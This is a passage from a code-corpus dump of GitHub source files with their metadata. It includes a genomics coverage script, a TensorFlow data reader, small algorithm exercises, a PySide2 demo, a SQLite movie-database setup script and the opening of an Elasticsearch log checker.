file...\")\n rgn_cov_tree = load_p_lis(args.parent_lis_filename)\n if args.samplecovpaths_file == \"stdin\":\n rgncov_filepaths_fh = sys.stdin\n else:\n rgncov_filepaths_fh = open(args.samplecovpaths_file, \"r\")\n print(\"loading rgn filepaths...\")\n rgncov_filepaths = load_rgncov_filepaths( rgncov_filepaths_fh, genders )\n \n for gender in (1,2):\n for rgncov_filepath in rgncov_filepaths[ gender ]:\n print(\"loading \"+rgncov_filepath+\" to coverage tree..\")\n rgn_cov_tree = load_rgncov( rgncov_filepath, gender, rgn_cov_tree )\n print(\"writing per-nucleotide coverage stats to output file\")\n write_cov_samples_per_pos(rgn_cov_tree, \n args.parent_lis_filename,\n args.out_filename,\n full_loc_info=args.full_loc_info,\n buff_size=args.buff_size)\n return\n\ndef parse_args():\n ''' load user-defined arguments and options '''\n desc='''for each position in parent region file, return the number of samples\n from list of paths to coverage files where coverage is sufficient \n for de novo mutation analysis '''\n parser = argparse.ArgumentParser(prog=\"cov_samples_per_pos\", \n description=desc)\n parser.add_argument('--includeY', action=\"store_true\", dest=\"includeY\", \n default=False, help='include Y chromosome genes')\n parser.add_argument('--full-loc-info',action=\"store_true\",default=False,\n help=\"in output, write cols 1-3 for loc info.\")\n parser.add_argument('--buff-size',action=\"store\",type=int,default=50000,\n help=\"size of buffer in writing to output file\")\n parser.add_argument('parent_lis_filename', action=\"store\", \n help='.lis file with all nucleotides to assess for coverage')\n parser.add_argument('samplecovpaths_file', action=\"store\", \n help='table with IID as col1 and col2 as path to ' + \\\n 'per-trio coverage files representing assessable sites')\n parser.add_argument('sampleped_file',action=\"store\",\n help='ped file with needed gender info')\n parser.add_argument('out_filename', action=\"store\", help='name of analysis output file')\n args = parser.parse_args(sys.argv[1:])\n return args\n\ndef load_rgncov_filepaths(rgncov_filepaths_fh, genders_dict):\n ''' make sure rgncov_filepath points to an existing file and then add it to list of \n files to assess, otherwise halt program '''\n rgncov_filepaths = {1:[], 2:[]}\n for line in rgncov_filepaths_fh:\n 
rgncov_filepath = line.rstrip()\n if os.path.isfile(rgncov_filepath) == False:\n print(\"rgncov file \"+rgncov_filepath+\" does not exist. Exiting...\")\n sys.exit(1)\n filename_base = os.path.basename(rgncov_filepath)\n fid_iid = filename_base.split(\".\")[0]\n [fid, iid] = fid_iid.split(\"_\")\n gender = genders_dict[ iid ]\n rgncov_filepaths[ gender ].append( rgncov_filepath )\n return rgncov_filepaths\n\n\ndef load_p_rgn(p_rgn_fh):\n ''' load parent genomic intervals into tree of the following structure :\n /\\\n gene\n \\\n chrom\n \\\n pos\n '''\n rgn_cov_tree = {}\n i = 0\n for line in p_rgn_fh:\n i += 1\n data = line.rstrip().split()\n try:\n gene,chrom,intervals_str = data[:3]\n intervals = load_intervals_str(intervals_str, i)\n except:\n print(\"malformed rgn file entry at line \" + str(i) + \". Exiting...\")\n sys.exit(1)\n if chrom not in rgn_cov_tree: rgn_cov_tree[chrom] = {}\n if gene not in rgn_cov_tree[chrom]: rgn_cov_tree[chrom][gene] = {}\n for interval in intervals:\n for pos in xrange(interval[0], interval[1]+1): \n rgn_cov_tree[chrom][gene][pos] = 0\n print(i)\n\n p_rgn_fh.close()\n return rgn_cov_tree\n\ndef load_p_lis(parent_lis_filename, skip_header=True):\n ''' load parent genomic sites from .lis file into tree of \n the following structure :\n /\\\n gene\n \\\n chrom\n \\\n pos\n '''\n\n p_lis_fh = open(parent_lis_filename, \"r\")\n rgn_cov_tree = {}\n i = 0\n for line in p_lis_fh:\n i += 1\n if i == 1 and skip_header == True: continue\n data = line.rstrip().split()\n try:\n gene,chrom,pos = data[:3]\n pos = int(pos)\n except:\n print(\"malformed .lis file entry at line \" + str(i) + \". Exiting...\")\n sys.exit(1)\n if chrom not in rgn_cov_tree: rgn_cov_tree[chrom] = {}\n if gene not in rgn_cov_tree[chrom]: rgn_cov_tree[chrom][gene] = {}\n if pos not in rgn_cov_tree[chrom][gene]:\n rgn_cov_tree[chrom][gene][pos] = 0\n \n p_lis_fh.close()\n return rgn_cov_tree\n\ndef load_intervals_str(intervals_str, i = -1):\n ''' convert rgn formatted intervals to a list of interval start-stops '''\n intervals_str = intervals_str[1:-1]\n if len(intervals_str) == 0:\n return []\n intervals = intervals_str.split(\",\")\n for j in xrange(len(intervals)):\n intervals[j] = intervals[j].split(\"..\")\n intervals[j] = [int(intervals[j][0]), int(intervals[j][1])]\n #try:\n # intervals[j] = [int(intervals[j][0]), int(intervals[j][1])]\n #except:\n # print(\"malformed intervals at line \" + str(i) + \". 
Exiting...\")\n # sys.exit(1)\n return intervals\n\ndef load_rgncov(rgncov_filename, rgncov_gender, \n rgn_cov_tree, chrom_gene = True):\n ''' count sufficiently covered nucleotides from parent region file using trio-level\n rgn-cov file, store to rgn_cov_tree, return rgn_cov_tree '''\n global CHRS_INCLUDE\n if rgncov_filename.find(\".gz\") != -1:\n rgncov_fh = gzip.open(rgncov_filename, \"rb\")\n else:\n rgncov_fh = open(rgncov_filename, \"r\")\n i = 0\n\n # data struct to keep track of repeated chrom/pos passed in rgn file\n cov_chrpos=dict()\n\n for line in rgncov_fh:\n i += 1\n\n data = line.rstrip().split()\n if chrom_gene == True:\n chrom,gene,intervals_str = data[:3]\n else:\n gene,chrom,intervals_str = data[:3]\n intervals = load_intervals_str(intervals_str, i)\n if chrom not in CHRS_INCLUDE: continue\n if (chrom==\"X\" or chrom==\"Y\") and rgncov_gender==1:\n n_copies = 2\n else:\n n_copies = 2\n gene_node = rgn_cov_tree[chrom][gene]\n if chrom not in cov_chrpos: cov_chrpos[chrom]=set()\n for interval in intervals:\n for pos in range(interval[0], interval[1]+1):\n if pos not in cov_chrpos[chrom]:\n gene_node[pos] += n_copies\n cov_chrpos[chrom].add(pos)\n rgncov_fh.close()\n return rgn_cov_tree\n\ndef write_cov_samples_per_pos(rgn_cov_tree, \n parent_lis_filename,\n out_filename, delim=\"\\t\",\n buff_size=50000,\n full_loc_info=False,\n skip_header=True):\n ''' print number of samples sufficiently covered at each\n gene-chrom-pos in input parent rgn file '''\n out_fh = open(out_filename, \"w\")\n out_fh.write(\"\")\n out_fh.close()\n \n p_lis_fh = open(parent_lis_filename, \"r\")\n b = 0\n\n i = 0\n b = 0\n out_fh = open(out_filename, \"a\")\n for line in p_lis_fh:\n i += 1\n if i == 1 and skip_header == True: continue\n data = line.rstrip().split()\n gene,chrom,pos = data[:3]\n pos = int(pos)\n n_samples_cov = rgn_cov_tree[chrom][gene][pos]\n if full_loc_info == False:\n out_row_str = str( n_samples_cov )\n else:\n out_row = [gene,chrom,pos,n_samples_cov]\n out_row_str = delim.join([str(item) for item in out_row])\n out_fh.write(out_row_str + \"\\n\")\n b += 1\n if b == buff_size:\n out_fh.close()\n out_fh = open(out_filename, \"a\")\n out_fh.close()\n return \n\nif __name__ == '__main__':\n main()\n","repo_name":"Halvee/OCD_WES_analysis_full_NatureNeuro2020","sub_path":"src/trio_coverage/cov_samples_per_pos.py","file_name":"cov_samples_per_pos.py","file_ext":"py","file_size_in_byte":8898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25693789970","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport tensorflow as tf\nfrom libs import decode_block\n\nclass SketchReader(object):\n \"\"\"TFRecords data reader.\n Read data from TFRecord data, based on a multi-thread, queue-based input pipeline.\n \"\"\"\n\n def __init__(self, tfrecord_list, raw_size, shuffle=False, num_threads=1, batch_size=1,\n nb_epoch=None, with_key=False):\n \"\"\"Reader initializer.\n\n Args:\n :param tfrecord_list: tfrecord file lists.\n :param raw_size: decode raw data size.\n :param shuffle: shuffle data flag.\n :param num_threads: number of threads to read data.\n :param batch_size: batch size.\n :param nb_epoch: number of epochs, 1 if final test phase\n :param with_key: the key from extracted key-value pair.\n \"\"\"\n self._reader = None\n self._queue = None\n self._tfrecord_list = tfrecord_list\n self._raw_size = raw_size\n 
self._shuffle = shuffle\n self._nb_threads = num_threads\n self._batch_size = batch_size\n self._nb_epoch = nb_epoch\n self._with_key = with_key\n\n def _read_raw(self):\n \"\"\"Read raw data from TFRecord.\n\n Returns:\n :return: data list [input_raw, label_raw].\n \"\"\"\n # 生成TFRecord Reader\n self._reader = tf.compat.v1.TFRecordReader()\n # 读取tfrecord文件,读取得到的是一个序列化的example\n _, serialized_example = self._reader.read(self._queue)\n # print(\"序列化的example:serialized_example:\", serialized_example)# Tensor(\"ReaderReadV2:1\", shape=(), dtype=string)\n # 解析得到的系列化example,需要按照存储时的格式还原features,必须写明features内的字典的键索引得到特定的数据!\n features = tf.io.parse_single_example(serialized=serialized_example,\n features={\n 'name': tf.io.FixedLenFeature([], tf.string),\n 'block': tf.io.FixedLenFeature([], tf.string)\n })\n\n input_raw, label_raw = decode_block(features['block'], tensor_size=self._raw_size)#decode block输入进去的是features['block'],这个是一个字符串,是对训练集中Sketch和3D图形图片的压缩 ;输出的是两个代表inputdata和label的tensor\n # decode_block的输入\n # print(\"features['name']打印值\", features['name'])# Tensor(\"ParseSingleExample/ParseExample/ParseExampleV2:1\", shape=(), dtype=string)\n # print(\"features['block']打印值\", features['block'])#features['block']打印值 Tensor(\"ParseSingleExample/ParseExample/ParseExampleV2:0\", shape=(), dtype=string)\n if self._with_key:\n return input_raw, label_raw, features['name']\n # print(\"input_raw打印值\", input_raw)#Tensor(\"DecodeBlock:0\", shape=(256, 256, 6), dtype=float32)\n # print(\"label_raw打印值\", label_raw)#Tensor(\"DecodeBlock:1\", shape=(256, 256, 17), dtype=float32)\n return input_raw, label_raw\n\n def _batch_data(self):\n \"\"\"Assemble data into one batch.\n\n Returns:\n :return: batch data with shape [N, H, W, C].\n \"\"\"\n # 生成文件队列\n self._queue = tf.compat.v1.train.string_input_producer(self._tfrecord_list,\n num_epochs=self._nb_epoch,\n shuffle=self._shuffle)\n\n example = self._read_raw()\n\n queue_buf = 500\n cap_shuffle = queue_buf + 3 * self._batch_size\n cap_noShuffle = (self._nb_threads + 1) * self._batch_size\n\n if self._shuffle:\n batch_data = tf.compat.v1.train.shuffle_batch(\n tensors=example,\n batch_size=self._batch_size,\n num_threads=self._nb_threads,\n capacity=cap_shuffle,\n min_after_dequeue=queue_buf\n )\n else:\n batch_data = tf.compat.v1.train.batch(\n tensors=example,\n batch_size=self._batch_size,\n num_threads=self._nb_threads,\n capacity=cap_noShuffle\n )\n return batch_data\n\n def next_batch(self):\n \"\"\"Load next batch\n\n Returns:\n :return: next batch data.\n \"\"\"\n return self._batch_data()\n","repo_name":"Doggerlas/Computer-Graphics","sub_path":"PROJECT/Sketch-CNN/CODE/network/script/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6767487839","text":"import itertools\nimport re\n\n\ndef truth_table(expression):\n # Define the variables in the expression\n variables = sorted(set(re.findall(r'\\b[A-Za-z]\\b', expression)))\n\n # Determine the width of the longest variable\n width = max(len(v) for v in variables)\n\n # Print the header row\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n print('| ' + ' | '.join(v.center(width) for v in variables) + ' | Result |')\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n\n # Generate all possible combinations of values for the variables\n for values in itertools.product([True, False], repeat=len(variables)):\n # 
Create a dictionary mapping variables to values\n assignment = dict(zip(variables, values))\n\n # Evaluate the expression under this assignment of values\n result = eval(expression, assignment)\n\n # Print the values of the variables and the result of the expression\n print('| ' + ' | '.join(str(int(v)).rjust(width) for v in values) + ' | ' + str(result).ljust(7) + '|')\n\n # Print the footer row\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n\n\ntruth_table(\"(A and B) or (C and D)\")\n","repo_name":"chrisoeser/Compute-Truth-Tables","sub_path":"truth_table.py","file_name":"truth_table.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962127122","text":"\"\"\"\nhttps://leetcode.com/problems/majority-element/\n\nGiven an array nums of size n, return the majority element.\n\nThe majority element is the element that appears more \nthan ⌊n / 2⌋ times. You may assume that the majority \nelement always exists in the array.\n\nExample 1:\nInput: nums = [3,2,3]\nOutput: 3\n\nExample 2:\nInput: nums = [2,2,1,1,1,2,2]\nOutput: 2\n\nConstraints:\nn == nums.length\n1 <= n <= 5 * 10^4\n-2^31 <= nums[i] <= 2^31 - 1\n \nFollow-up: Could you solve the problem in \nlinear time and in O(1) space?\n\"\"\"\nfrom typing import List\nfrom collections import Counter\n\n\ndef hashmap(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(n)\n count = {}\n for num in nums:\n count[num] = count.get(num, 0) + 1\n\n max_elem, max_count = None, float(\"-inf\")\n for k, v in count.items():\n if v > max_count:\n max_elem, max_count = k, v\n\n return max_elem\n\n\ndef hashmap2(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(n)\n count = Counter(nums)\n return max(count.keys(), key=count.get)\n\n\ndef moore_voting(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(1)\n elem, count = nums[0], 1\n n = len(nums)\n for i in range(1, n):\n if count == 0:\n elem, count = nums[i], 1\n elif nums[i] == elem:\n count += 1\n else:\n count -= 1\n\n return elem\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Majority element\")\n print(\"-\" * 60)\n\n test_cases = [\n ([1], 1),\n ([1, 2, 1], 1),\n ([1, 2, 1, 2, 1], 1),\n ([1, 2, 1, 2, 2, 22, 2, 1, 2], 2),\n ]\n\n for nums, solution in test_cases:\n\n print(f\"Array: {nums}\")\n\n result = hashmap(nums)\n output = f\" hashmap = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = hashmap2(nums)\n output = f\" hashmap2 = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = moore_voting(nums)\n output = f\" moore_voting = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"hashmaps/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23286831771","text":"import 
sys\nfrom PySide2 import QtWidgets, QtGui\n\nfrom MainWindow import Ui_MainWindow\n\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n\n # Further location UI customization\n self.actionQuit.setShortcut(QtGui.QKeySequence.Quit)\n self.actionQuit.triggered.connect(self.close)\n\n self.actionAdd.triggered.connect(self.Add)\n self.actionClear.triggered.connect(self.Clear)\n\n vlayout = self.findChild(QtWidgets.QVBoxLayout, \"verticalLayout\")\n # vlayout.addWidget(QtWidgets.QLabel(\"Parameters\"))\n\n def Add(self):\n print('Adding')\n self.verticalLayout.addWidget(QtWidgets.QLabel(\"Adding\"))\n\n def Remove(self):\n print('Remove')\n child = self.verticalLayout.takeAt(0)\n if child:\n self.verticalLayout.removeItem(child)\n del child\n self.verticalLayout.update()\n\n def Clear(self):\n print('Clear number of widgets = {}'.format(self.verticalLayout.count()))\n child = self.verticalLayout.takeAt(0)\n while child:\n self.verticalLayout.removeItem(child)\n del child\n child = self.verticalLayout.takeAt(0)\n self.verticalLayout.update()\n\napp = QtWidgets.QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n\n","repo_name":"nyue/QtQuestions","sub_path":"PySide2/layout/add_delete_items_vboxlayout/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11597592662","text":"import time\nfrom typing import Callable, Dict, List, Union, Any\n\n\nTIMINGS: Union[None, \"Timings\"] = None\n\n\ndef config_timings_value():\n \"\"\"Innitialise the TIMINGS value\"\"\"\n global TIMINGS\n TIMINGS = Timings()\n\n\nclass Timings:\n \"\"\"Track the timings of values that are marked with the time_function decorator\"\"\"\n\n FRAME_NUMBER: int = 0\n\n __named_timing: \"_TimedValue\"\n named_timings: Dict[str, \"Timings\"]\n __frame_number: int\n\n def __init__(self, timing=None):\n self.named_timing = timing\n self.named_timings = dict()\n\n def add(\n self,\n value: float,\n *names: str\n ):\n \"\"\"Add a value to a named timing\"\"\"\n if len(names) == 0:\n self.named_timing.add_value(value, self.FRAME_NUMBER)\n return\n name = names[0]\n if name in self.named_timings:\n self.named_timings[name].add(value, *names[1:])\n else:\n self.named_timings[name] = Timings(_TimedValue())\n self.named_timings[name].add(value, *names[1:])\n\n def increase_frame_count(self):\n Timings.FRAME_NUMBER += 1\n\n def get_time_summary(self, total_upper_time: float = None) -> str:\n \"\"\"Get the percentages of all the named timings that are saved\"\"\"\n summary = \"\"\n timings = {}\n for name, timing in self.named_timings.items():\n average_time = timing.named_timing.get_average_value()\n timings[name] = (average_time, timing.get_time_summary(average_time))\n total_time_timed = sum(value[0] for value in timings.values()) if total_upper_time is None else total_upper_time\n if total_time_timed == 0:\n return \"\"\n for name, value_summary in timings.items():\n summary += f\"{name}: ({(value_summary[0] / total_time_timed) * 100:.2f}%)\\n\"\n for line in value_summary[1].split(\"\\n\"):\n if len(line) == 0:\n continue\n summary += f\" - {line}\\n\"\n return summary\n\n\nclass _TimedValue:\n \"\"\"Track a list of a certain length of time it took to run a function per frame. 
All calls in one frame are put\n together\"\"\"\n MAX_SAVED_TIMINGS = 100 # a list of timings saved for each saved varaible\n\n time_values: List[Union[float, None]]\n __additon_index: int\n __frame_nmr: int\n\n def __init__(self):\n self.time_values = [None for _ in range(self.MAX_SAVED_TIMINGS)]\n self.__addition_index = 0\n self.__frame_nmr = -1\n\n def add_value(\n self,\n value: float,\n actual_frame_number: int,\n ):\n \"\"\"Add a value at the addition_index (cycles from 0-MAX_SAVED_TIMINGS to make it a bit more efficient) and add\n the value up if within the same frame otherwise put in the next slot\"\"\"\n if actual_frame_number != self.__frame_nmr:\n self.__frame_nmr = actual_frame_number\n self.time_values[self.__addition_index] = value\n self.__addition_index += 1\n if self.__addition_index > self.MAX_SAVED_TIMINGS - 1:\n self.__addition_index = 0\n else:\n self.time_values[self.__addition_index - 1] += value\n\n def get_average_value(self) -> float:\n \"\"\"Get the average value of the time_values\"\"\"\n valid_values = [value for value in self.time_values if value is not None]\n return sum(valid_values) / len(valid_values)\n\n\ndef time_function(*time_names: str) -> Any:\n \"\"\"Time a function decorated with this\"\"\"\n def function_decorator(func: Callable):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n global TIMINGS\n TIMINGS.add(end - start, *time_names)\n return result\n return wrapper\n return function_decorator\n","repo_name":"bramvanwersch/Machine_mining","sub_path":"python_code/utility/game_timing.py","file_name":"game_timing.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1950997108","text":"# 파라메트릭서치인 이유?\n# 1) 막걸리 용량 : 2^31 -1\n# 2) 최대키워드\nimport sys\nsi = sys.stdin.readline\nn, k = map(int, si().split())\narr = [int(input()) for i in range(n)]\n\n\ndef determine(capacity):\n #k명에게 막걸리 분배하는 로직\n cnt = 0\n for x in arr:\n cnt += (x // capacity) #몇명한테 나눠줄 수 있는 지구하기\n return k <= cnt \n \n\n#구하고자 하는 값 : 최대한 많은양의 막걸리를 분배할 수 있는 용량\n#막걸리를 남으면 버린다.\ns, e, answer = 0, (1 << 31) - 1, 0\nwhile s <= e:\n mid = (s + e) // 2\n if mid == 0:\n answer = 0\n break\n if determine(mid):\n #막걸리가 분배가 된다는 것은 양이 낮다는의미이다.\n s = mid + 1\n answer = mid\n else:\n e = mid - 1\nprint(answer)","repo_name":"JongPyoAhn/Python","sub_path":"코딩테스트/이분탐색/파라미터서치/이상한 술집.py","file_name":"이상한 술집.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69934978492","text":"import sqlite3\nimport tkinter as tk\nfrom tkinter import messagebox as msg\n\n\n# !!!!!!!!!!!!!!!!!!!!!!!!\n# If you have Movies.db, do not run this code.\n# The original Movies.db has some film datas.\n# This code is for resetting the database.\n# !!!!!!!!!!!!!!!!!!!!!!!!\n\n\n\ndef get_db_connection():\n return sqlite3.connect(\"movies.db\")\n\n\ndef create_db_table():\n try:\n conn = get_db_connection()\n cur = conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS User (\n uid INTEGER PRIMARY KEY AUTOINCREMENT,\n userName TEXT,\n userPassword TEXT\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Directors (\n d_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n d_name TEXT \n );\"\"\")\n\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Films(\n film_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n tr_title TEXT,\n en_title TEXT,\n tr_desc TEXT,\n en_desc 
TEXT,\n image BLOB,\n imdb NUMERIC,\n d_ID INTEGER,\n year INTEGER\n\n );\"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Actors(\n actor_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n actor_name TEXT\n\n );\"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS FilmActor(\n actor_ID INTEGER,\n film_ID INTEGER\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Categories(\n c_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n c_trName TEXT,\n c_enName TEXT\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS FilmCategory (\n c_ID INTEGER,\n film_ID INTEGER\n\n );\"\"\")\n '''\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Directors(\n d_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n d_name TEXT \n );\n\n CREATE TABLE IF NOT EXISTS Films (\n film_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n tr_title TEXT,\n en_title TEXT,\n tr_desc TEXT,\n en_desc TEXT,\n image BLOB,\n imdb NUMERIC,\n d_ID INTEGER\n\n );\n CREATE TABLE IF NOT EXISTS Actors (\n actor_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n actor_name TEXT\n\n );\n\n CREATE TABLE IF NOT EXISTS FilmActor(\n actor_ID INTEGER ,\n film_ID INTEGER\n\n );\n\n CREATE TABLE IF NOT EXISTS Categories(\n c_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n c_trName TEXT,\n c_enName TEXT\n\n );\n\n CREATE TABLE IF NOT EXISTS FilmCategory (\n c_ID INTEGER,\n film_ID INTEGER\n\n );\n\n \"\"\")\n '''\n conn.commit()\n conn.close()\n msg.showinfo(\"Setup Database\", \"Database table created.\")\n except Exception as exc:\n msg.showerror(\"Error\", \"Error: \" + str(exc))\n\n\ncreate_db_table()\n\n\ndef insert_category_table(tr, en):\n try:\n conn = get_db_connection()\n cur = conn.cursor()\n cur.execute(\"INSERT INTO Categories (c_trName, c_enName) VALUES (:ctr,:cen)\",\n {\"ctr\": tr,\n \"cen\": en})\n conn.commit()\n conn.close()\n # msg.showinfo(\"Done\", \"Insert successful\")\n\n except Exception as exc:\n msg.showerror(\"Error\", \"Error: \" + str(exc))\n\n\ninsert_category_table(\"Aksiyon\", \"Action\")\ninsert_category_table(\"Animasyon\", \"Animation\")\ninsert_category_table(\"Korku\", \"Horror\")\ninsert_category_table(\"Komedi\", \"Comedy\")\ninsert_category_table(\"Suç\", \"Crime\")\ninsert_category_table(\"Dram\", \"Drama\")\ninsert_category_table(\"Macera\", \"Adventure\")\ninsert_category_table(\"Bilim-Kurgu\", \"Sci-Fi\")\ninsert_category_table(\"Gizem\", \"Mystery\")\ninsert_category_table(\"Romantik\", \"Romance\")\ninsert_category_table(\"Fantastik\", \"Fantasy\")\ninsert_category_table(\"Süper Kahraman\", \"Superhero\")\n","repo_name":"ilkerefeyavuz/FilmCatalogue","sub_path":"ReSetupDatabase.py","file_name":"ReSetupDatabase.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6297434623","text":"from django.urls import path, include\nfrom . 
import views\nurlpatterns = [\n path('', views.home_view, name= 'home_view'),\n path('login/', views.login_view, name='login_view'),\n # path('login/validate', views.login_validate, name='login_validate'),\n # path('logout/', views.logout, name='logout'),\n path('nav_list/', views.nav_list_view, name='nav_list_view'),\n path('product_detial/', views.product_detail_view, name='product_detail_view'),\n path('search/', views.search_view, name='search_view'),\n path('signup/', views.signup_view, name='signup_view'),\n # path('join/', views.join_page, name='join_page'),\n # path('edit/', views.edit_user_info, name='edit_user_info'),\n]\n","repo_name":"bongj9/h_d","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3708199331","text":"# 5 - Реализуйте RLE алгоритм: реализуйте модуль сжатия \n# и восстановления данных. Входные и выходные данные \n# хранятся в отдельных текстовых файлах.\n# файл первый:\n# AAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCDDDDDDEEEEEFFFFG python is sooooooo coooooool\n# файл второй:\n# сжатый текст.\nimport os\nos.system('cls')\n\ndef write_file(input_string: str):\n '''\n Записывает информацию в файл\n '''\n with open('RLE_input_data.txt', 'w', encoding ='utf-8') as file:\n file.write(input_string)\n \ndef RLE_encoding(string: str) -> str:\n '''\n Кодирует данные и записывает их в файл\n '''\n i = 0\n compressed = ''\n while i < len(string):\n count = 1\n while i + 1 < len(string) and string[i] == string[i + 1]:\n count = count + 1\n i = i + 1\n if count == 1: # это условие позволет избавиться от '1'\n compressed += string[i]\n i = i + 1\n else:\n compressed += str(count) + string[i]\n i = i + 1\n with open('RLE_output_data.txt', 'w', encoding ='utf-8') as file:\n file.write(compressed)\n return compressed\n\ndef data_decoding(encoding_data: str) -> str:\n '''\n Раскодирует данные и возвращает строку\n '''\n data = ''\n count = ''\n for char in encoding_data: \n if char.isdigit(): \n count += char \n else: \n if not count:\n count = 1\n data += char * int(count) \n count = '' \n return data\n\ninput_data = input('Введите данные: ')\nwrite_file(input_data)\ncompressed_data = RLE_encoding(input_data)\noutput_data = data_decoding(compressed_data)\nprint('Исходные данные ->', input_data)\nprint('Закодированные данные -> ', compressed_data)\nprint('Раскодировнные данные -> ', output_data)","repo_name":"AlexHall884/Home_Work_Python","sub_path":"Home_Work_04/Task_5.py","file_name":"Task_5.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12780235090","text":"import os\n\n\ndef isBinod(item):\n global allBinod\n with open(item) as f:\n binod = f.read()\n if \"binod\" in binod.lower():\n print(f\"Binod is found in {item}.\")\n allBinod += 1\n else:\n print(f\"No Binod in {item}.\")\n\n\nif __name__ == \"__main__\":\n allBinod = 0\n dir_contents = os.listdir()\n print(dir_contents)\n\n for item in dir_contents:\n if item.endswith(\"txt\"):\n isBinod(item)\n\n print(f\"We found a total of {allBinod} Binod.\")\n","repo_name":"AlzyWelzy/pythonPractice","sub_path":"problem-10.py","file_name":"problem-10.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40789278978","text":"# coding=utf-8\n# __author__ = 'shunchiguo'\n\nimport sys\nimport 
getopt\nimport math\nimport datetime\nfrom statistics import mean\nfrom elasticsearch import Elasticsearch\nfrom Logger import Logger\n\n\nclass CheckBase:\n\tdef __init__(self, app_name, method=\"\", warn_rate=0, error_rate=0, sample_time=15, sample_num=100,\n\t check_type=\"up\", index_name=\"quality_log\", app_ip=\"\",\n\t hosts=['192.168.30.65', '192.168.30.66', '192.168.30.67'], debug_time=None,\n\t http_url=\"\", http_method=\"\"):\n\t\tself.app_ip = app_ip\n\t\tself.app_name = app_name\n\t\tself.method = method\n\t\tself.warn_rate = warn_rate\n\t\tself.error_rate = error_rate\n\t\tself.sample_time = sample_time\n\t\tself.sample_num = sample_num\n\t\tself.hosts = hosts\n\t\tself.index_name = index_name\n\t\tself.check_type = check_type\n\t\tself.debug_time = debug_time\n\t\tself.http_url = http_url\n\t\tself.http_method = http_method\n\t\tself.es = Elasticsearch(hosts)\n\t\tLogger.debug(\"init config: index_name={}, app_ip={}, app_name={}, method={}, warn_rate={}, \\\nerror_rate={}, sample_time={}, sample_num={}, hosts={}\"\n\t\t .format(self.index_name, self.app_ip, self.app_name, self.method, self.warn_rate, self.error_rate,\n\t\t self.sample_time, self.sample_num, self.hosts))\n\n\tdef build_body(self, dt_begin, dt_end):\n\t\tbody = {\n\t\t\t\"query\": {\n\t\t\t\t\"and\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"term\": 